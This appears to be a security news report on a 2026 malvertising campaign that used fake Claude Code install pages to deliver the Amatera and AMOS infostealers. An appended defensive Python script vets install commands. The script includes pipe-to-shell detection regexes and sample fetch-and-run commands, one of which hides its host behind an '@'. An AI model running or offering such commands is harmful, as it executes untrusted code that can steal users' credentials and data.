Emerging Threats in AI Development Tools
In March 2026, Kaspersky Threat Research uncovered a new malicious campaign that specifically targets developers seeking installation instructions for Claude Code, an AI development agent created by Anthropic. The attack begins when users search for “Claude Code download” and are shown sponsored advertisements at the top of the search results. These ads redirect users to a malicious webpage that closely mimics the official installation documentation for Claude Code.
This deceptive website is designed to look identical to the legitimate one, making it difficult for users to distinguish between the real and fake content. The page is hosted on Squarespace, a popular website-building and hosting platform, which adds to its credibility. Users who copy and execute the installation commands from this site unknowingly install malware that harvests sensitive information such as credentials, cryptocurrency wallet data, browser sessions, and other confidential files.
Similar tactics have been observed in campaigns targeting other popular AI tools, including OpenClaw. The attackers use the same method to trick users into downloading malicious software disguised as legitimate downloads for these tools.
Malware Variants Targeting Different Operating Systems
The malicious commands delivered through these fake installation instructions deploy different infostealers depending on the operating system:
Windows systems receive Amatera, an information-stealing malware. Amatera collects data from user directories, web browsers, and cryptocurrency wallets before sending the stolen information to a remote server. This malware has previously been associated with campaigns using the ClickFix distribution technique and operates under a Malware-as-a-Service (MaaS) model.
macOS systems receive AMOS, another infostealer that has been documented in several malware campaigns targeting Apple devices. Kaspersky researchers have previously reported on this threat.
Kaspersky’s findings also reveal that similar malicious campaigns have targeted other AI tools like OpenClaw and Doubao. Attackers registered multiple domains and distributed files containing the Amatera infostealer while disguising them as legitimate downloads for these tools.
Risks Posed to Developers and Businesses
Vladimir Gursky, a cybersecurity expert at Kaspersky, highlighted the significant risks posed by this campaign. He stated, “AI development tools such as Claude Code and OpenClaw are widely used not only by hobbyists and automation enthusiasts but also by professional developers working in large organizations. If infected, victims may unknowingly expose source code from active projects, confidential corporate data, authentication credentials, and private accounts. This makes such campaigns particularly dangerous for businesses whose developers rely on AI-assisted coding tools.”
Historical Context of Similar Attacks
In December 2025, Kaspersky detected another instance of a macOS infostealer being spread via Google Ads. In this case, a specially generated chat interface was designed to resemble a ChatGPT tutorial, pretending to guide users through installing the Atlas Browser. The malicious instructions appeared to be hosted on a legitimate site associated with OpenAI, helping attackers gain users’ trust.
These evolving threats underscore the importance of vigilance when downloading and installing AI development tools. Developers must remain cautious and verify the authenticity of sources before executing any installation commands. As cybercriminals continue to exploit the popularity of AI tools, staying informed and adopting robust security practices is more critical than ever.
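One way to act on the advice above is to vet a copied install command before it reaches a terminal. The sketch below is an added example, not Kaspersky's or any vendor's tooling: `downloads.vendor.example` is a placeholder for the vendor's real download host, the function names are hypothetical, and the sample commands are constructed.

```python
import re
from urllib.parse import urlsplit

# Assumption: placeholder for the vendor's real download host, taken from
# documentation reached by typing the vendor's address, not from an ad.
TRUSTED_HOSTS = {"downloads.vendor.example"}
# Website-builder platforms; the fake documentation described above was
# hosted on Squarespace.
SITE_BUILDER_SUFFIXES = ("squarespace.com",)

URL_RE = re.compile(r"https?://[^\s'\"|;)<>]+", re.IGNORECASE)
# Remote content handed straight to an interpreter (POSIX shells, PowerShell).
PIPE_TO_SHELL_RE = re.compile(
    r"\|\s*(sudo\s+)?(ba|z|da)?sh\b|\|\s*iex\b|\biex\s*\(|Invoke-Expression",
    re.IGNORECASE)

def _under(host, domain):
    """True if host is the domain itself or a subdomain of it."""
    return host == domain or host.endswith("." + domain)

def review_install_command(command, trusted_hosts=TRUSTED_HOSTS):
    """Return (severity, message) findings for a pasted install command."""
    findings = []
    urls = URL_RE.findall(command)
    for url in urls:
        # .hostname drops any "user@" prefix, so a trusted-looking name
        # placed before "@" does not count as the host.
        host = (urlsplit(url).hostname or "").lower().rstrip(".")
        if url.lower().startswith("http://"):
            findings.append(("high", f"plain HTTP download: {host}"))
        if any(_under(host, s) for s in SITE_BUILDER_SUFFIXES):
            findings.append(("high", f"site-builder host: {host}"))
        elif not any(_under(host, t) for t in trusted_hosts):
            findings.append(("high", f"host not on allowlist: {host}"))
    if urls and PIPE_TO_SHELL_RE.search(command):
        findings.append(("review", "remote script piped to an interpreter"))
    return findings

if __name__ == "__main__":
    # Constructed sample commands, not taken from the campaign.
    samples = [
        "curl -fsSL https://downloads.vendor.example/install.sh | bash",
        "curl -fsSL https://vendor-docs.squarespace.com/install.sh | bash",
        "irm https://downloads.vendor.example@cdn.invalid/i.ps1 | iex",
    ]
    for cmd in samples:
        print(cmd, "->", review_install_command(cmd) or "no findings")
```

A "review" finding on a trusted host still means the script should be downloaded and read before it is run.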






